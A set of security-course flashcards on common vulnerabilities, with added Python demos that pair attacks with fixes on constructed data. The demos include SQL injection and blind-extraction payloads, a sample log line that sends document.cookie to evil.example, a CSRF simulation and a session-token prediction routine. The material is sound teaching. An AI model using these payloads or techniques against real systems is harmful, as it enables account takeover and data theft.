Section - 18 - Vulnerabilities and attacks Flashcards

1
Q

What is an SQL injection attack?

A

It is an attack in which an attacker sends malicious SQL through a website's input forms or URL parameters so that it is executed by the back-end SQL database.

It works when the server builds the query by concatenating user input into the SQL text without validating or sanitizing it and without using parameterised queries. It can lead to unauthorized access to sensitive data, and to modifying or deleting that data.

Ex = ' OR '1'='1 <- this is sent as the password on a username/password login page; the leading quote closes the string literal and the rest adds an always-true condition, so the WHERE clause matches every row.

2
Q

What are URL parameters?

A

URL parameters are used to pass values (filters, search terms, page numbers) to a web page inside the URL itself.
They start after a "?" and consist of key=value pairs separated by "&"; e.g. https://example.com/search?q=shoes&page=2 carries q=shoes and page=2. Because they are attacker-controlled input, they are a common injection point.

3
Q

What are 3 types of SQL injection attacks?

A
  1. In-band SQL injection attack - The attacker gets the output through the same channel used to send the attack (for example, query results or a database error message appear in the web page).
  2. Out-of-band SQL injection attack - The attacker cannot see the result in the web response and instead makes the database server send the data over a different channel, such as a DNS or HTTP request to a server the attacker controls.
  3. Inferential (blind) SQL injection attack - The attacker gets no direct output but infers information about the database from the application's behaviour (a true/false difference in the response, or a time delay) and uses that to build up the main attack.
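
Added example for cards 1 to 3 (not from the course or the original flashcards): a small SQLite-backed login that builds its query by string concatenation, the same login done with a parameterised query, a helper that reads URL parameters, and a boolean-based blind probe. The table contents, the URL and the payloads are constructed for the demonstration.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit


def make_db():
    """Constructed in-memory users table for the demonstration (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def params_from_url(url):
    """Parse the URL parameters: everything after '?', key=value pairs joined by '&'."""
    return {key: values[0] for key, values in parse_qs(urlsplit(url).query).items()}


def vulnerable_login(conn, username, password):
    """Builds the SQL text by string concatenation: the input becomes part of the query."""
    sql = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def safe_login(conn, username, password):
    """Parameterised query: values travel separately from the SQL text, so a quote in
    the input can never terminate the string literal or add a new condition."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def blind_probe(conn, condition):
    """Inferential (boolean-based blind) injection against the vulnerable login: the
    attacker only learns whether the login succeeded, and uses that single bit to test
    a condition about the database. The '--' comments out the password check."""
    username = "nobody' OR (" + condition + ") --"
    return len(vulnerable_login(conn, username, "x")) > 0


def demo():
    conn = make_db()
    # Normal login driven by URL parameters such as /login?username=bob&password=hunter2
    p = params_from_url("https://shop.example/login?username=bob&password=hunter2")
    normal = vulnerable_login(conn, p["username"], p["password"])

    # Classic in-band injection: the password field closes the literal and appends an
    # always-true condition, so the WHERE clause matches every row (admin included).
    payload = "' OR '1'='1"
    injected = vulnerable_login(conn, "anything", payload)
    parameterised = safe_login(conn, "anything", payload)

    # Blind probe: is the first character of alice's password 's'? One bit per request.
    first_is_s = blind_probe(
        conn, "substr((SELECT password FROM users WHERE username='alice'),1,1)='s'"
    )
    return normal, injected, parameterised, first_is_s


if __name__ == "__main__":
    print(demo())
```

The parameterised version returns nothing for the payload because the driver treats the whole string as a literal value to compare against; that, not input "sanitizing", is the fix. The blind probe shows why a login page that only answers "success/failure" still leaks data: repeat it per character and position to read the whole password.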
4
Q

What is an XML injection attack?

A

It is targeted at applications or XML parsers that process XML data.
These applications or parsers might receive data from web forms or other API interfaces, which attackers can exploit if the input from these sources is not sanitized or validated.
In this attack, an attacker inserts malicious XML content (extra elements, attributes or entity declarations) into the data that the XML-processing application parses.

5
Q

What are 2 specific types of XML attacks that DION taught?

A

XML bomb attack (also known as the Billion Laughs attack) - In this attack, the attacker exploits the way XML parsers expand entity references: a small document defines entities that reference each other in nested layers, so expansion grows exponentially and exhausts the parser's memory and CPU (a denial of service).

XML External Entity (XXE) - In this attack, the attacker exploits the way the XML parser handles external entity references: an entity that points at a local file path or a URL makes the parser read that file or make that request, which can disclose files from the server or reach internal systems. Mitigation for both: disable DTD processing and external entity resolution in the parser.

6
Q

What is a cross-site scripting attack?

A

It is an attack in which a threat actor injects malicious script, typically written in JavaScript, into web pages viewed by other users.
With this attack, an attacker can steal personal information from clients, hijack their sessions (e.g. by reading session cookies) or deliver malware to the client system.

7
Q

What are different types of cross-site scripting attacks?

A

Reflected XSS - in this attack, the threat actor crafts a URL with the malicious script in a parameter and lures the victim into clicking on the link.
A vulnerable web server reflects that parameter straight back into its response without encoding it, so the script arrives in the page.
The client trusts the response from this trusted site and its browser runs the malicious script.

Stored XSS attack - see next card

DOM-based XSS attack - see next card

8
Q

What are Stored XSS attack and DOM-based XSS attack?

A

Stored XSS attack - in this attack, the threat actor injects the malicious script into data that the server stores (a comment, a profile field, a forum post) and serves back later; every client that visits the affected page then runs the script.

DOM-based XSS attack - DOM stands for Document Object Model - This XSS attack occurs entirely on the client side.
The page's own JavaScript takes attacker-controlled data (for example from location.hash or document.URL) and writes it into the DOM through a dangerous sink such as innerHTML or document.write, so the script executes in the victim's browser without the server ever having sent it.

9
Q

From log data, how can we tell that an attack is an XSS (reflected or stored) attack?

A

If the logged request contains script content, e.g. a <script> tag, a javascript: URL or an event handler such as onerror=, that indicates a reflected or stored XSS attempt. The payload was sent to the server, usually percent-encoded, so decode the request before looking.

10
Q

From log data, how can we tell that an attack is a DOM-based XSS attack?

A

In the log data, if the payload references DOM objects such as document.cookie, document.write or document.location, most likely it is a DOM-based XSS attack. Caveat: a DOM-based payload placed in the URL fragment (after #) is never sent to the server, so it will not appear in server logs at all; the page source or client-side telemetry is needed in that case.
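
Added example covering cards 9 and 10 (not from the course or the original flashcards): the two heuristics applied to constructed access-log lines. The log lines, IP addresses and hostnames are made up for the demonstration; the script content is percent-encoded as a browser would send it, so each line is decoded first. The precedence (DOM references first, then generic script markers) is the cards' heuristic, not a definitive classifier: a reflected payload can also read document.cookie, and a DOM-based payload in the URL fragment never reaches the server at all.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in common log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /comment?text=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1" 200 640
203.0.113.7 - - [10/Oct/2023:13:57:12 +0000] "GET /page?name=%3Cscript%3Enew+Image().src%3D%27http%3A%2F%2Fevil.example%2Fc%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 777
198.51.100.9 - - [10/Oct/2023:13:58:40 +0000] "GET /products?id=42&sort=price HTTP/1.1" 200 2048
"""

# Script content that only makes sense as an XSS payload: a script tag, a javascript:
# URL, or an inline event handler such as onerror= / onload=.
SCRIPT_RE = re.compile(r"<script|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)

# References to DOM objects: the payload reads or manipulates the Document Object Model.
DOM_RE = re.compile(r"\b(?:document|window|location)\.[a-zA-Z]+", re.IGNORECASE)


def classify_request(line):
    """Return (category, matched_snippet) for one log line."""
    decoded = unquote_plus(line)          # %3C -> '<', '+' -> ' ', %27 -> "'" and so on
    dom_hit = DOM_RE.search(decoded)
    script_hit = SCRIPT_RE.search(decoded)
    if dom_hit:
        return "dom-based-xss", dom_hit.group(0)
    if script_hit:
        return "reflected-or-stored-xss", script_hit.group(0)
    return "benign", ""


def classify_log(text):
    """Classify every non-empty line of an access log."""
    return [classify_request(line) for line in text.splitlines() if line.strip()]


if __name__ == "__main__":
    for category, snippet in classify_log(SAMPLE_LOG):
        print(f"{category:25} {snippet}")
```

Treat a hit as a lead to triage, not a verdict: check the response the server actually produced and whether the parameter is reflected in it (reflected), stored and served to others (stored), or only consumed by client-side script (DOM-based).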

11
Q

What is cross-site request forgery (CSRF) attack?

A

In this attack, the threat actor tricks the victim's browser into sending a forged request (without the victim's knowledge) to a trusted web server where the victim is already authenticated; the browser attaches the session cookie automatically, so the server accepts the request as the victim's.
This request can be to update the email address, reset the password, transfer money etc.

12
Q

How does a Cross-Site Request Forgery attack work?

A
  1. The victim authenticates to a website and receives a session cookie.
  2. The attacker crafts a malicious web page or an email with a malicious link or form that, when clicked or submitted, sends the forged request to the server; the victim's browser adds the session cookie by itself.
  3. The attacker tricks the victim into clicking on the link or visiting the page.
  4. The trusted website executes the forged request assuming it came from the legitimate user.
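
Added example for the four steps above (not from the course or the original flashcards): a simulated "change email" endpoint in its vulnerable form and in a hardened form using a per-session synchronizer token plus an Origin check. The site name, session store, user record and the attacker's page are all constructed; `browser_submit` stands in for the browser's habit of attaching the session cookie to every request for the site, which is the behaviour CSRF exploits.

```python
import hmac
import secrets

SITE_ORIGIN = "https://bank.example"        # assumed origin of the trusted site
SESSIONS = {}                                # session id -> session data (constructed store)
EMAILS = {"alice": "alice@example.com"}      # constructed user record


def login(user):
    """Step 1: the victim authenticates and gets a session cookie (plus a per-session CSRF token)."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(16)}
    return sid


def csrf_token_for(sid):
    """The site's own pages embed this token in their forms; a cross-site page cannot read it."""
    return SESSIONS[sid]["csrf"]


def change_email_vulnerable(request):
    """Trusts the session cookie alone: whoever can make the browser send it wins."""
    sess = SESSIONS.get(request["cookies"].get("sid"))
    if sess is None:
        return 401
    EMAILS[sess["user"]] = request["form"]["email"]
    return 200


def change_email_hardened(request):
    """Synchronizer-token pattern plus an Origin check."""
    sess = SESSIONS.get(request["cookies"].get("sid"))
    if sess is None:
        return 401
    token = request["form"].get("csrf", "")
    if not hmac.compare_digest(token, sess["csrf"]):
        return 403                       # forged request: no valid token for this session
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403                       # defence in depth: the request came from another site
    EMAILS[sess["user"]] = request["form"]["email"]
    return 200


def browser_submit(handler, sid, form, page_origin):
    """Simulates the browser: the session cookie is attached automatically no matter which
    page triggered the submission. That automatic behaviour is what CSRF abuses."""
    request = {"cookies": {"sid": sid}, "form": form, "headers": {"Origin": page_origin}}
    return handler(request)


def demo():
    sid = login("alice")                                     # step 1
    attacker_form = {"email": "attacker@evil.example"}       # step 2: hidden auto-submitting form
    # Steps 3-4: the victim visits evil.example; the forged request hits the vulnerable endpoint
    r_vuln = browser_submit(change_email_vulnerable, sid, attacker_form, "https://evil.example")
    hijacked = EMAILS["alice"]
    EMAILS["alice"] = "alice@example.com"                    # reset for the second run
    # The same forged request against the hardened endpoint: no token and a foreign Origin
    r_forged = browser_submit(change_email_hardened, sid, attacker_form, "https://evil.example")
    # A legitimate submission from the site's own page, carrying the per-session token
    legit_form = {"email": "new@example.com", "csrf": csrf_token_for(sid)}
    r_legit = browser_submit(change_email_hardened, sid, legit_form, SITE_ORIGIN)
    return r_vuln, hijacked, r_forged, r_legit, EMAILS["alice"]


if __name__ == "__main__":
    print(demo())
```

In a real deployment the session cookie should also carry the SameSite=Lax or SameSite=Strict attribute so the browser does not attach it to cross-site form posts in the first place; the token check stays as the primary control because SameSite depends on browser behaviour.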
13
Q

What are cookies and what are their 2 types?

A

Cookies are small text records that the browser stores and sends back to the web server on later requests; they typically hold the user's session identifier and preferences.

There are 2 types of cookies

  1. Non-persistent - these are also called session cookies. This cookie type has no expiry date, stays only in the browser's memory and is discarded when the browser session ends.
  2. Persistent cookie - These carry an Expires or Max-Age value and are stored on disk by the browser until they expire or are deleted.
14
Q

What is DOM?

A

DOM stands for Document Object Model.
It is a programming interface that represents an HTML or XML document as a tree of objects (elements, attributes, text).
The DOM makes it easy for scripts to read and modify HTML and XML data; in the browser it is what JavaScript uses to change a page.

15
Q

What is a session prediction attack?

A

It is a type of spoofing attack in which an attacker attempts to predict a valid session token in order to hijack another user's session.

This attack succeeds against servers that generate session tokens with a predictable algorithm (sequential numbers, timestamps, weak pseudo-random generators) instead of a cryptographically random value for each session.
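
Added example (not from the course or the original flashcards): a constructed session-token generator that just increments a clock-seeded counter, the attacker's prediction routine that opens a few sessions of its own and extrapolates the next token, and the same attack failing against tokens drawn from the OS CSPRNG via `secrets`. The generator and the attack are simplified for illustration; real weak generators are usually noisier than a fixed stride, but the method (sample, model, extrapolate) is the same.

```python
import secrets
import time


class PredictableSessions:
    """Weak generator (constructed): the token is the hex of a counter seeded from
    the clock, so each new session is simply the previous value plus one."""

    def __init__(self):
        self._counter = int(time.time())

    def new_token(self):
        self._counter += 1
        return f"{self._counter:016x}"


class RandomSessions:
    """Strong generator: 32 bytes (256 bits) from the OS CSPRNG per session."""

    def new_token(self):
        return secrets.token_hex(32)


def predict_next(observed):
    """Attacker's side: read the observed tokens as integers, assume a fixed-stride
    sequence and extrapolate the next value, formatted to the same width."""
    values = [int(t, 16) for t in observed]
    stride = values[-1] - values[-2]
    width = len(observed[-1])
    return f"{values[-1] + stride:0{width}x}"


def hijack_attempt(generator, samples=3):
    """Open a few sessions as the attacker, predict the next token, then compare with
    the token the next (victim) login really receives. True means the hijack worked."""
    own = [generator.new_token() for _ in range(samples)]
    guess = predict_next(own)
    victim = generator.new_token()
    return guess == victim


if __name__ == "__main__":
    print("weak generator hijacked:", hijack_attempt(PredictableSessions()))
    print("CSPRNG generator hijacked:", hijack_attempt(RandomSessions()))
```

The defence is not a longer counter but a token with at least 128 bits of unpredictable entropy from a CSPRNG, regenerated on login (to also block session fixation) and never derived from user-visible values such as time or user id.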

16
Q

What is Function call stack?

A

When a function is called within a program, the CPU needs to keep track of where execution should return to after the function completes. The return address is pushed onto a region of memory called the function call stack, together with the function's saved registers and local variables (including any local buffers).

17
Q

What is a Buffer Overflow attack?

A

It is an attack in which an attacker sends more data to an application's buffer than it can hold, so the excess data overflows into the adjacent memory.

The overflowed data can overwrite critical values stored next to the buffer, such as other variables or the saved return address of the current function.
If the return address is overwritten, the CPU returns to an address the attacker chose, which can point at the attacker's own malicious code, so that code executes with the privileges of the program.

18
Q

What is Smashing the Stack attack?

A

It is a specific type of buffer overflow attack in which the attacker overflows a local buffer on the function call stack to overwrite the function's saved return address, so that when the function returns, execution jumps to the attacker's malicious code.

19
Q

Give one example of a mitigation technique that protects against buffer overflow attacks.

A

ASLR - Address Space Layout Randomization -
In this technique, the memory locations of a program's components (the stack, the heap, the executable code, shared libraries) are randomized each time the program is run. This makes it much harder for an attacker to predict the memory addresses where vulnerable code or data structures reside, so an exploit with a hard-coded return address is likely to miss. It is normally combined with stack canaries and a non-executable stack (DEP/NX).

20
Q

What are Race condition attacks?

A

In this attack, an attacker exploits the gap between the moment a program checks a resource and the moment it uses it: TOC (Time of Check), TOU (Time of Use) and TOE (Time of Evaluation). These are known as TOCTOU (time-of-check to time-of-use) flaws: the attacker changes the resource (a file, a balance, a permission) after the check has passed but before the use happens, so the program acts on stale information.

21
Q

What is one common method to protect against Race condition attacks?

A

We can make use of locks (for example, locking a file so that only the user currently editing it can change it) and mutexes, so that the check and the use happen as one atomic step.

Mutex - It is a mutually exclusive flag that acts as a gatekeeper to a section of code so that only one thread can execute it at a time. Used carelessly (two threads each holding one lock while waiting for the other's) it can lead to deadlocks.
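
Added example for cards 20 and 21 (not from the course or the original flashcards): a constructed bank-account withdrawal with a check-then-use window, run by two threads at once, first without and then with a mutex. The delay between the check and the use is artificial; it widens the race window so the result is reproducible, but the same interleaving can happen without it under real scheduling.

```python
import threading
import time


class Account:
    """Constructed example: a balance that two concurrent withdrawals race for."""

    def __init__(self, balance):
        self.balance = balance
        self._lock = threading.Lock()

    def withdraw_racy(self, amount):
        if self.balance >= amount:            # time of check
            time.sleep(0.05)                  # constructed delay: widens the TOCTOU window
            self.balance -= amount            # time of use: the checked condition may no longer hold
            return True
        return False

    def withdraw_locked(self, amount):
        with self._lock:                      # check and use become one atomic step
            if self.balance >= amount:
                time.sleep(0.05)
                self.balance -= amount
                return True
            return False


def run_concurrently(method, amount, threads=2):
    """Start several withdrawals at the same time and collect their results."""
    results = []
    workers = [
        threading.Thread(target=lambda: results.append(method(amount)))
        for _ in range(threads)
    ]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return sorted(results)


def demo():
    """Two withdrawals of 100 from a balance of 100: the racy version lets both
    succeed and drives the balance negative; the locked version allows only one."""
    racy = Account(100)
    racy_results = run_concurrently(racy.withdraw_racy, 100)
    locked = Account(100)
    locked_results = run_concurrently(locked.withdraw_locked, 100)
    return racy.balance, racy_results, locked.balance, locked_results


if __name__ == "__main__":
    print(demo())
```

On the deadlock point from the card: if code ever needs more than one lock, always acquire them in the same global order and hold them for as short a time as possible; a second lock taken in the opposite order by another thread is the classic deadlock.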

22
Q

What are different kinds of hardware vulnerabilities?

A
  1. Unpatched system
  2. Legacy system/ End-of-life systems/ unsupported systems
  3. Firmware vulnerabilities
  4. Default Hardware configurations or misconfigurations
23
Q

What are different techniques to protect from Hardware vulnerabilities?

A
  1. System hardening - We perform hardening by closing unneeded ports, disabling unneeded services and setting up proper permissions.
  2. Patching - There should be a good patch management process in the organization that looks after all patching work, firmware included.
  3. Regular audits to find hardware misconfigurations.
  4. Training employees on how to use systems securely.
  5. Decommissioning - Unsupported systems should be decommissioned.
  6. Isolation - If a legacy system is a core component of the enterprise and cannot be decommissioned, we should isolate it (e.g. no direct internet access, restricted management access).
  7. Segmentation of the network.
24
Q

What are common Bluetooth Vulnerabilities?

A

Insecure pairing - when Bluetooth devices do not implement proper authentication for pairing (e.g. "Just Works" pairing with no PIN or confirmation).

On-path attack - the attacker places a device between two Bluetooth devices and relays or alters the traffic between them; insecure pairing is what makes this possible.

Device spoofing - an attacker might spoof the name and Bluetooth address (BD_ADDR) of a legitimate device in the hope of pairing with another device.

25
Q

What are Bluejacking and Bluesmacking attacks?

A

Bluejacking - In this attack, the threat actor sends unsolicited messages to a victim's device, either to annoy the victim or to find other Bluetooth-related vulnerabilities in that device.

Bluesmacking - It is a kind of DoS attack on Bluetooth devices (oversized L2CAP ping packets crash or freeze the device).

26
Q

What are Bluesnarfing and Bluebugging attacks?

A

Bluesnarfing attack - In this attack, an attacker exploits a Bluetooth vulnerability on a victim's device and gains unauthorized access to its data. For example - access to call logs, messages, the phone book etc.

Bluebugging - In this attack, an attacker exploits a Bluetooth vulnerability and takes control of the victim's device, being able to make phone calls, send messages or access the internet from the victim's device.

BlueBorne - a set of vulnerabilities (disclosed in 2017) in the Bluetooth stacks of several operating systems that let an attacker within radio range take over a device without pairing and without the device being discoverable.

27
Q

What are few ways to protect from Bluetooth attacks?

A
  1. Turn Off the Bluetooth when not needed
  2. Set the device to be in “Non-discoverable mode”
  3. Regularly update device (Firmware update as well)
  4. Only pair with trusted devices
  5. Use unique keys or PINs to authenticate pairing (not the default 0000/1234)
  6. Use encryption for sensitive data transfer.
28
Q

What are few vulnerabilities related to mobile devices?

A
  1. Sideloading - installing applications from sources other than the official app store. For example - downloading an app package directly from a website, which bypasses the security checks of the Play Store or App Store.
  2. Jailbreaking (rooting on Android) - It is the process that gives escalated privileges to users on the device and allows them to bypass the built-in security measures provided by the device.
    Why they might do it - It can be to install some application that is normally not allowed to run, like a pirated application/game.
  3. Insecure connection methods - connecting over untrusted networks or links (open Wi-Fi, pairing with unknown Bluetooth devices) that expose the device's traffic.

Mitigation - use an MDM (Mobile Device Management) solution in the enterprise network to enforce policies such as blocking sideloading and detecting jailbroken devices.

29
Q

What are few vulnerabilities related to Operating systems?

A
  1. Unpatched systems
  2. Default configurations/misconfigurations
  3. Zero-day attacks - Deploy HIPS (host-based intrusion prevention), since no patch exists yet.
  4. Data exfiltration - use DLP (data loss prevention) controls.
  5. Malicious updates - only install updates from official channels and maintain an application allow-list.